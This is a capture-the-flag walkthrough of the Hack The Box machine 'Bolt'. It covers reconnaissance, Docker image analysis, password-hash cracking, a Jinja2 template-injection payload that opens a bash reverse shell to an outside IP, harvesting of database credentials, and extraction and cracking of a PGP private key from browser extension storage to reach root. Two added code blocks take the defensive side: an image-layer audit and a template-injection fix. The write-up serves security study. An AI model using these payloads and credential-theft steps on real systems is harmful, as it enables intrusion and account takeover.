[Hack The Box] HTB—Bolt walkthrough

Procrastinating, procrastinating... once the box is retired I can just crib from the walkthrough.

HTB—Bolt

  • [Hack The Box] HTB—Bolt walkthrough
  • I. Information gathering
    • 1. Ports
    • 2. vhosts
  • II. Web exploitation
    • 1. Docker analysis
    • 2. Source code review
    • 3. SSTI
  • III. Privilege escalation
    • 1. Finding a password to log in as eddie
    • 2. eddie's private key
    • 3. PGP decryption

Official writeup: https://app.hackthebox.com/machines/Bolt/walkthroughs

I. Information gathering

1. Ports

nmap

nmap -sV 10.10.11.114

Deeper scan of the open ports

nmap -sC -sV -n -T5 -p 22,80,443 10.10.11.114 -oN PortsDepth.txt

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)
|   256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)
|_  256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-title:     Starter Website -  About
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2021-02-24T19:11:23
|_Not valid after:  2022-02-24T19:11:23
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The TLS certificate on port 443 has the common name commonName=passbolt.bolt.htb.

The Common Name (AKA CN) represents the server name protected by the SSL certificate. The certificate is valid only if the request hostname matches the certificate common name. Most web browsers display a warning message when connecting to an address that does not match the common name in the certificate.

Add both hostnames to /etc/hosts:

10.10.11.114    bolt.htb
10.10.11.114    passbolt.bolt.htb

Passbolt | Open source password manager for teams

Starter Website - About (bolt.htb)

2. vhosts

Enumerate subdomains (I also tried ffuf, but gobuster felt easier to use):

gobuster vhost  -w /usr/share/dnsrecon/subdomains-top1mil.txt -u http://bolt.htb/

Two more subdomains turn up:

Found: mail.bolt.htb (Status: 200) [Size: 4943]
Found: demo.bolt.htb (Status: 302) [Size: 219]

http://mail.bolt.htb/

http://demo.bolt.htb/

II. Web exploitation

Port 80 looks like Bolt CMS, which has a known command execution vulnerability, but it needs a logged-in user (it later turned out this is not Bolt CMS at all...).

Registration fails, and brute-forcing the admin user did not succeed.

1. Docker analysis

Browsing the homepage reveals a download option; download the image from there.

Load and run the docker image image.tar:

docker load --input image.tar
docker images       # list images
# flask-dashboard-adminlte_appseed-app           latest    859e74798e6c   11 months ago   154MB
docker run -itd 859e74798e6c    # run the image
docker exec -it 623ea34 /bin/sh     # enter the container

The site files live under /app; copy them out with docker cp:

docker cp 623ea347a31f:app ./app

Together with run.py and the configuration file config.py in the root directory, take a quick look at the source.

2. Source code review

config.py

import os
from decouple import config


class Config(object):

    basedir = os.path.abspath(os.path.dirname(__file__))

    # Set up the App SECRET_KEY
    SECRET_KEY = config('SECRET_KEY', default='S#perS3crEt_007')

    # This will create a file in <app> FOLDER
    SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'db.sqlite3')
    SQLALCHEMY_TRACK_MODIFICATIONS = False

    MAIL_SERVER = 'localhost'
    MAIL_PORT = 25
    MAIL_USE_TLS = False
    MAIL_USE_SSL = False
    MAIL_USERNAME = None
    MAIL_PASSWORD = None
    DEFAULT_MAIL_SENDER = 'support@bolt.htb'


class ProductionConfig(Config):
    DEBUG = False

    # Security
    SESSION_COOKIE_HTTPONLY = True
    REMEMBER_COOKIE_HTTPONLY = True
    REMEMBER_COOKIE_DURATION = 3600

    # PostgreSQL database
    SQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(
        config('DB_ENGINE', default='postgresql'),
        config('DB_USERNAME', default='appseed'),
        config('DB_PASS', default='pass'),
        config('DB_HOST', default='localhost'),
        config('DB_PORT', default=5432),
        config('DB_NAME', default='appseed-flask')
    )


class DebugConfig(Config):
    DEBUG = True


# Load all possible configurations
config_dict = {
    'Production': ProductionConfig,
    'Debug': DebugConfig
}

The format of SQLALCHEMY_DATABASE_URI makes it obvious that the app uses flask_sqlalchemy (or plain sqlalchemy) to connect to PostgreSQL:

SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'db.sqlite3')
postgresql://appseed:pass@localhost:5432/appseed-flask

However, the latest layer of the docker image I restored does not contain db.sqlite3; it sits in the layer whose id starts with a4ea.

The sqlite3 database is not encrypted, so dump it and open it:

admin $1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.
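The situation above (a file gone from the final container but still present in an older layer) is worth automating when auditing images. Added example, not code from the box or the appseed project: it reads a `docker save` tarball, walks the layers in manifest.json order, and reports where a given file appears and where a later whiteout entry deletes it; the two-layer sample image it builds is constructed inline.

```python
import io
import json
import os
import tarfile
import tempfile


def find_in_image(image_tar: str, filename: str) -> list[tuple[int, str, str]]:
    """Report every layer that adds or deletes `filename`, oldest layer first.
    Layer order comes from manifest.json; a `.wh.<name>` entry is the whiteout
    marker Docker writes when a later build step removes the file."""
    hits = []
    with tarfile.open(image_tar) as image:
        manifest = json.load(image.extractfile("manifest.json"))
        for idx, layer_name in enumerate(manifest[0]["Layers"]):
            with tarfile.open(fileobj=image.extractfile(layer_name)) as layer:
                for member in layer.getmembers():
                    base = member.name.rsplit("/", 1)[-1]
                    if member.isfile() and base == filename:
                        hits.append((idx, member.name, "present"))
                    elif member.isfile() and base == ".wh." + filename:
                        hits.append((idx, member.name, "deleted"))
    return hits


def _tar_bytes(files: dict[str, bytes]) -> bytes:
    """Build one layer tar in memory from {path: content}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path, content in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_sample_image(path: str) -> None:
    """Constructed two-layer image (not the real flask-dashboard image):
    layer 0 copies a dev database into /app, layer 1 deletes it again."""
    layers = {
        "aaaa/layer.tar": _tar_bytes({"app/db.sqlite3": b"SQLite format 3\x00stub"}),
        "bbbb/layer.tar": _tar_bytes({"app/.wh.db.sqlite3": b"",
                                      "app/config.py": b"SECRET_KEY = 'x'\n"}),
    }
    manifest = [{"Config": "cfg.json", "RepoTags": [], "Layers": list(layers)}]
    with tarfile.open(path, "w") as image:
        for name, data in {**layers, "manifest.json": json.dumps(manifest).encode()}.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            image.addfile(info, io.BytesIO(data))


def demo() -> list[tuple[int, str, str]]:
    """Build the sample image in a temp dir and search it for db.sqlite3."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "image.tar")
        build_sample_image(path)
        return find_in_image(path, "db.sqlite3")
```

The same loop run over the real image.tar from the box would list the a4ea layer as "present" even though the final container no longer has the file.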

Now back to how the passwords are hashed:

app/base/routes.py

@blueprint.route('/login', methods=['GET', 'POST'])
def login():
    login_form = LoginForm(request.form)
    if 'login' in request.form:

        # read form data
        username = request.form['username']
        password = request.form['password']

        # Locate user
        user = User.query.filter_by(username=username).first()

        # Check the password
        stored_password = user.password
        stored_password = stored_password.decode('utf-8')
        if user and compare_hash(stored_password, crypt.crypt(password, stored_password)):
            login_user(user)
            return redirect(url_for('base_blueprint.route_default'))

        # Something (user or pass) is not ok
        return render_template('accounts/login.html', msg='Wrong user or password', form=login_form)

compare_hash(stored_password, crypt.crypt(password, stored_password)): later I found that John the Ripper recognises this hash format and cracks it directly, so there is no need to write a Python script.

john -w=/usr/share/wordlists/rockyou.txt admin.hash

admin user password:
admin/deadbolt

A Python script from a more experienced player

This account logs into http://bolt.htb/admin/home, but the main site has nothing exploitable.

Logging into mail.bolt.htb with the admin account returns an error, so try registering a new user on demo.bolt.htb.

app\base\routes.py under the layer 41093412e0da959c80875bb0db640c1302d5bcdffec759a3a5670950272789ad

@blueprint.route('/register', methods=['GET', 'POST'])
def register():
    login_form = LoginForm(request.form)
    create_account_form = CreateAccountForm(request.form)
    if 'register' in request.form:

        username = request.form['username']
        email = request.form['email']
        code = request.form['invite_code']
        if code != 'XNSS-HSJW-3NGU-8XTJ':
            return render_template('code-500.html')
        data = User.query.filter_by(email=email).first()
        if data is None and code == 'XNSS-HSJW-3NGU-8XTJ':
            # Check username exists
            user = User.query.filter_by(username=username).first()
            if user:
                return render_template('accounts/register.html',
                                       msg='Username already registered',
                                       success=False,
                                       form=create_account_form)

            # Check email exists
            user = User.query.filter_by(email=email).first()
            if user:
                return render_template('accounts/register.html',
                                       msg='Email already registered',
                                       success=False,
                                       form=create_account_form)

            # else we can create the user
            user = User(**request.form)
            db.session.add(user)
            db.session.commit()

            return render_template('accounts/register.html',
                                   msg='User created please <a href="/login">login</a>',
                                   success=True,
                                   form=create_account_form)

    else:
        return render_template('accounts/register.html', form=create_account_form)

The invite code is hard-coded: code == 'XNSS-HSJW-3NGU-8XTJ'

3. SSTI

After registering and logging in (I had already noticed the app uses Jinja2), search the source for render_template to look for an SSTI. Here is the profile handler:

@blueprint.route("/example-profile", methods=['GET', 'POST'])
@login_required
def profile():
    """Profiles"""
    if request.method == 'GET':
        return render_template('example-profile.html', user=user, current_user=current_user)
    else:
        """Experimental Feature"""
        cur_user = current_user
        user = current_user.username
        name = request.form['name']
        experience = request.form['experience']
        skills = request.form['skills']
        msg = Message(recipients=[f'{cur_user.email}'],
                      sender='support@example.com',
                      reply_to='support@example.com',
                      subject="Please confirm your profile changes")
        try:
            cur_user.profile_update = name
        except:
            return render_template('page-500.html')
        db.session.add(current_user)
        db.session.commit()
        token = ts.dumps(user, salt='changes-confirm-key')
        confirm_url = url_for('home_blueprint.confirm_changes', token=token, _external=True)
        html = render_template('emails/confirm-changes.html', confirm_url=confirm_url)
        msg.html = html
        mail.send(msg)
        return render_template('index.html')

Changing the profile leads to the SSTI, but the change first has to be confirmed through the mailbox:

@blueprint.route('/confirm/changes/<token>')
def confirm_changes(token):
    """Confirmation Token"""
    try:
        email = ts.loads(token, salt="changes-confirm-key", max_age=86400)
    except:
        abort(404)
    user = User.query.filter_by(username=email).first_or_404()
    name = user.profile_update
    template = open('templates/emails/update-name.html', 'r').read()
    msg = Message(recipients=[f'{user.email}'],
                  sender='support@example.com',
                  reply_to='support@example.com',
                  subject="Your profile changes have been confirmed.")
    msg.html = render_template_string(template % name)
    mail.send(msg)

Log into mail.bolt.htb with the email address used at registration and confirm the change; msg.html = render_template_string(template % name) is the SSTI, because the profile name is substituted into the template source before it is rendered.

{{''.__class__.__mro__}}
# (<class 'str'>, <class 'object'>)  look for usable references under object
{{''.__class__.__mro__[1].__subclasses__()}}
# <class 'os._wrap_close'> is entry 129
{{"".__class__.__bases__[0].__subclasses__()[129].__init__.__globals__['popen']('whoami').read()}}
# this payload did not work

# found this one instead, using the url_for() helper that Flask exposes to Jinja2
{{url_for.__globals__.os.popen("whoami").read()}}
# reverse shell
{{url_for.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.16.9/4444 0>&1"').read()}}
nc -lvvp 4444
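Added example, not code from the box: a minimal Jinja2 stand-in for confirm_changes() that shows why `template % name` is injectable and what the fix looks like. The update-name.html body is a constructed placeholder (the real file is not on the page); the example is written from the defender's side, with the harmless `{{ 7 * 7 }}` probe, the hardened renderer, and an audit check for stored names that carry template delimiters.

```python
from jinja2 import Environment

# Constructed stand-in for templates/emails/update-name.html (the real file is
# not on the page); what matters is that it is %-formatted with the user's name.
UPDATE_NAME_TEMPLATE = "<p>Hello %s, your profile name has been updated.</p>"

_env = Environment(autoescape=True)


def render_vulnerable(name: str) -> str:
    """Mirrors confirm_changes(): the stored name is spliced into the template
    SOURCE before Jinja parses it, so any {{ }} / {% %} inside `name` is
    evaluated as template code rather than shown as text."""
    return _env.from_string(UPDATE_NAME_TEMPLATE % name).render()


def render_fixed(name: str) -> str:
    """Hardened version: the template source is a constant and `name` is passed
    as a context variable, so Jinja treats it as data and autoescapes it."""
    template = _env.from_string(
        "<p>Hello {{ name }}, your profile name has been updated.</p>"
    )
    return template.render(name=name)


def looks_like_template_injection(name: str) -> bool:
    """Defender-side audit check for stored profile_update values: flag any
    value carrying Jinja delimiters so it can be rejected or reviewed."""
    return any(marker in name for marker in ("{{", "{%", "{#"))


if __name__ == "__main__":
    probe = "{{ 7 * 7 }}"  # harmless template-syntax probe
    print(render_vulnerable(probe))  # "<p>Hello 49, ...": the expression ran
    print(render_fixed(probe))       # "<p>Hello {{ 7 * 7 }}, ...": literal text
    print(looks_like_template_injection(probe))  # True
```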

III. Privilege escalation

1. Finding a password to log in as eddie

List the users that can log in / have a real shell:

cat /etc/passwd | grep -v nologin | grep -v false
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
eddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bash
clark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash

Connect to the database and check whether it holds information on the other users:

www-data@bolt:~/demo$ cat config.py
cat config.py
"""Flask Configuration"""
#SQLALCHEMY_DATABASE_URI = 'sqlite:///database.db'
SQLALCHEMY_DATABASE_URI = 'mysql://bolt_dba:dXUUHSW9vBpH5qRB@localhost/boltmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'kreepandcybergeek'
MAIL_SERVER = 'localhost'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
#MAIL_DEBUG = app.debug
MAIL_USERNAME = None
MAIL_PASSWORD = None
DEFAULT_MAIL_SENDER = 'support@bolt.htb'

mysql://bolt_dba:dXUUHSW9vBpH5qRB@localhost/boltmail

bolt_dba/dXUUHSW9vBpH5qRB

mysql -ubolt_dba -pdXUUHSW9vBpH5qRB
use boltmail;
show tables;    # user
select * from user;

The current user does not have enough privileges to read the mysql database, and the boltmail database does not contain what I need.

At that point I was stuck; the writeup says to search for files by owning user:

find /etc -user www-data 2>/dev/null
# /etc/passbolt/Seeds

/etc/passbolt/passbolt.php contains a password, rT2;jW7<eY8!dX8}pQ8%, in the following database configuration:

    // Database configuration.
    'Datasources' => [
        'default' => [
            'host' => 'localhost',
            'port' => '3306',
            'username' => 'passbolt',
            'password' => 'rT2;jW7<eY8!dX8}pQ8%',
            'database' => 'passboltdb',
        ],
    ],

Connect:

mysql --user=passbolt --password='rT2;jW7<eY8!dX8}pQ8%' --database=passboltdb
show tables;
# two tables are worth a look: users and secrets
# account_settings action_logs actions authentication_tokens avatars comments
# email_queue entities_history favorites gpgkeys groups groups_users
# organization_settings permissions permissions_history phinxlog profiles
# resource_types resources roles secret_accesses secrets secrets_history
# user_agents users
select * from secrets;  # output is truncated
select * from users;
select * from secrets\G # appending \G to a MySQL statement prints the result vertically, one field per line

secrets row:

*************************** 1. row ***************************
         id: 643a8b12-c42c-4507-8646-2f8712af88f8
    user_id: 4e184ee6-e436-47fb-91c9-dccb57f250bc
resource_id: cd0270db-c83f-4f44-b7ac-76609b397746
       data: -----BEGIN PGP MESSAGE-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

-----END PGP MESSAGE-----
    created: 2021-02-25 21:50:11
   modified: 2021-03-06 15:34:36

The password we obtained earlier is in fact also eddie's password:

eddie/rT2;jW7<eY8!dX8}pQ8%

Switch user:

su - eddie
python3 -c 'import pty;pty.spawn("/bin/bash")'

eddie's home directory contains user.txt, which should be the flag.

2. eddie's private key

find /var -user eddie 2>/dev/null
# /var/mail/eddie
cd /var/mail
ls
# eddie  none  root  www-data  xiaoz

The mail reads:

eddie@bolt:/var/mail$ cat eddie
From clark@bolt.htb  Thu Feb 25 14:20:19 2021
Return-Path: <clark@bolt.htb>
X-Original-To: eddie@bolt.htb
Delivered-To: eddie@bolt.htb
Received: by bolt.htb (Postfix, from userid 1001)
	id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)
Subject: Important!
To: <eddie@bolt.htb>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20210225212019.DFF264CD@bolt.htb>
Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)
From: Clark Griswold <clark@bolt.htb>

Hey Eddie,

The password management server is up and running.  Go ahead and download the extension to your browser and get logged in.  Be sure to back up your private key because I CANNOT recover it.  Your private key is the only way to recover your account.
Once you're set up you can start importing your passwords.  Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...

-Clark

So we should look for the private key ("Your private key is the only way to recover your account."); together with the secret pulled from the database earlier, it should be a PGP private key.

Web of trust, PGP, GPG

Pretty Good Privacy (PGP) is a security protocol built on a web of trust.

OpenPGP

In 1997 PGP became an Internet standard known as OpenPGP, and many email systems support it; the PGP web-of-trust idea fits email particularly well. In 2007 the PGP protocol updated its cryptographic algorithms, and support for Camellia, ECDSA, ECDH and EdDSA was added later.

GPG

GNU Privacy Guard (GnuPG or GPG) is encryption software, a GPL-licensed replacement for the PGP encryption software. GnuPG is designed according to the OpenPGP standard defined by the IETF and is used for encryption, digital signatures and generating asymmetric key pairs.

"Go ahead and download the extension to your browser and get logged in." The private key may be sitting in the browser's cache, so look for it under the home directory.

Chrome data path: ~/.config/google-chrome/Default

Firefox data path (macOS): ~/Library/Mozilla/Firefox/Profiles/xxxxxxxx.default/

~/Library/Application Support/Mozilla/Firefox/Profiles/xxxxxxxx.default/

grep -r 'BEGIN PGP PRIVATE KEY' ~/
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js:const PRIVATE_HEADER = '-----BEGIN PGP PRIVATE KEY BLOCK-----';
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js:            // BEGIN PGP PRIVATE KEY BLOCK
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js:      result.push("-----BEGIN PGP PRIVATE KEY BLOCK-----\r\n");
Binary file /home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log matches

Filter out the sections that match the private key format:

strings '/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log' | grep -oP '\-\-\-\-\-BEGIN PGP PRIVATE [\s\S]*?END PGP PRIVATE KEY BLOCK\-\-\-\-\-' | head -1
strings '/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js' | grep -oP '\-\-\-\-\-BEGIN PGP PRIVATE [\s\S]*?END PGP PRIVATE KEY BLOCK\-\-\-\-\-' | head -1

This yields the private key:

-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

-----END PGP PRIVATE KEY BLOCK-----

3. PGP decryption

PGP private keys are usually protected by a passphrase; gpg2john turns the key into a hash that john can crack:

gpg2john.exe pgp.txt > hash
john.exe hash

Passphrase: merrychristmas

Use an online tool (PGP Tool - online PGP key generator / encryption / decryption tool (pgptool.org)) to decrypt the encrypted PGP message obtained from the database earlier:

{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}

That is root's secret; switch user.

Flag obtained: 4a1c94ec439b2a1c143f228b6114155a

Reference writeups:

[HTB Series] Bolt | [承影安全团队 ChengYingTeam]

Bolt - [HTB] | Marmeus’s Website

Bolt|(7rocky.github.io)
